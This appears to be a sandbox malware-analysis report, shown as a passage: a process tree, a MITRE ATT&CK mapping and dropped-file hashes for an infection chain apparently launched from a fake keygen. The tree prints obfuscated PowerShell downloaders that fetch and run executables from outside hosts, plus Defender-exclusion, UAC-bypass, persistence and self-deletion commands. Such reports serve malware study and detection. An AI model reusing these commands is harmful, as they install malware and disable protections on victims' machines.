                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:2296
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2296 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\526151239310616\\* & exit
                    9⤵
                      PID:2492
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 2296
                        10⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1072
              • C:\Users\Public\qds.exe
                "C:\Users\Public\qds.exe"
                6⤵
                • Executes dropped EXE
                PID:3052
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\b1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1168
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1576
        • C:\Windows\SysWOW64\timeout.exe
          timeout 2
          3⤵
          • Delays execution with timeout.exe
          PID:872
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\ba.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:324
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1816
            • C:\Users\Public\krn.exe
              "C:\Users\Public\krn.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2404
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2452
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:2624
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2624 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\175002517810120\\* & exit
                    8⤵
                      PID:884
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 2624
                        9⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1984
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2504
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2708
                • C:\Users\Public\krn.exe
                  "C:\Users\Public\krn.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops desktop.ini file(s)
                  • Modifies system certificate store
                  PID:2560
                  • C:\Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe
                    "C:\Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1776
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                      "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe"'
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2784
                  • C:\Users\Admin\AppData\Local\Temp\X9DH86gp0e.exe
                    "C:\Users\Admin\AppData\Local\Temp\X9DH86gp0e.exe"
                    7⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:2512
                    • C:\Windows\SysWOW64\Notepad.exe
                      "C:\Windows\System32\Notepad.exe"
                      8⤵
                        PID:3020
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Users\Public\Natso.bat
                          9⤵
                            PID:1624
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:2876
                            • C:\Windows\SysWOW64\reg.exe
                              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                              10⤵
                              • Modifies registry key
                              PID:2480
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              10⤵
                                PID:1140
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c C:\Users\Public\Natso.bat
                              9⤵
                                PID:2556
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              8⤵
                                PID:1212
                            • C:\Users\Admin\AppData\Local\Temp\zs68fX4EC2.exe
                              "C:\Users\Admin\AppData\Local\Temp\zs68fX4EC2.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:1140
                              • \??\c:\windows\SysWOW64\cmstp.exe
                                "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\nbl5cekq.inf
                                8⤵
                                  PID:3060
                              • C:\Users\Admin\AppData\Local\Temp\n3DxbdaCun.exe
                                "C:\Users\Admin\AppData\Local\Temp\n3DxbdaCun.exe"
                                7⤵
                                • Executes dropped EXE
                                • Windows security modification
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2196
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" Get-MpPreference -verbose
                                  8⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2476
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\krn.exe"
                                7⤵
                                  PID:1464
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:2168
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1216
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1900

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\msvcp140.dll
                    • C:\ProgramData\msvcp140.dll
                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\vcruntime140.dll
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17f23ff7-07ef-4373-836b-41374b78b7d3
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1aab3011-f7be-4b50-9950-d9c37e8775e9
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39f2d5fc-e26a-49c1-a61a-46af2a7b41bd
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_460ab937-d1e7-48e8-a9de-d3d921af813f
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_563286d8-c106-44a1-bec9-7353d909c22d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b0130adf-51a1-4008-9559-4b9cd851be61
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe
                    • C:\Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\5199.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\X9DH86gp0e.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\X9DH86gp0e.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\n3DxbdaCun.exe
                    • C:\Users\Admin\AppData\Local\Temp\n3DxbdaCun.exe
                    • C:\Users\Admin\AppData\Local\Temp\zs68fX4EC2.exe
                    • C:\Users\Admin\AppData\Local\Temp\zs68fX4EC2.exe
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Public\Natso.bat
                    • C:\Users\Public\iup.exe
                    • C:\Users\Public\iup.exe
                    • C:\Users\Public\iup.exe
                    • C:\Users\Public\krn.exe
                    • C:\Users\Public\krn.exe
                    • C:\Users\Public\krn.exe
                    • C:\Users\Public\qds.exe
                    • C:\Users\Public\qds.exe
                    • C:\Users\Public\qds.exe
                    • C:\Windows\temp\nbl5cekq.inf
                    • \??\PIPE\lsarpc
                    • \??\PIPE\srvsvc
                    • \??\PIPE\srvsvc
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • \Users\Admin\AppData\Local\Temp\3vzk0pzDKP.exe
                    • \Users\Admin\AppData\Local\Temp\5199.tmp\Keygen.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\X9DH86gp0e.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\n3DxbdaCun.exe
                    • \Users\Admin\AppData\Local\Temp\zs68fX4EC2.exe
                    • \Users\Public\iup.exe
                    • \Users\Public\iup.exe
                    • \Users\Public\krn.exe
                    • \Users\Public\krn.exe
                    • \Users\Public\qds.exe
                    • memory/324-27-0x0000000000000000-mapping.dmp
                    • memory/432-23-0x0000000000000000-mapping.dmp
                    • memory/432-64-0x0000000005890000-0x0000000005891000-memory.dmp
                      Filesize

                      4KB

                    • memory/432-82-0x0000000006560000-0x0000000006561000-memory.dmp
                      Filesize

                      4KB

                    • memory/432-77-0x0000000005A60000-0x0000000005A61000-memory.dmp
                      Filesize

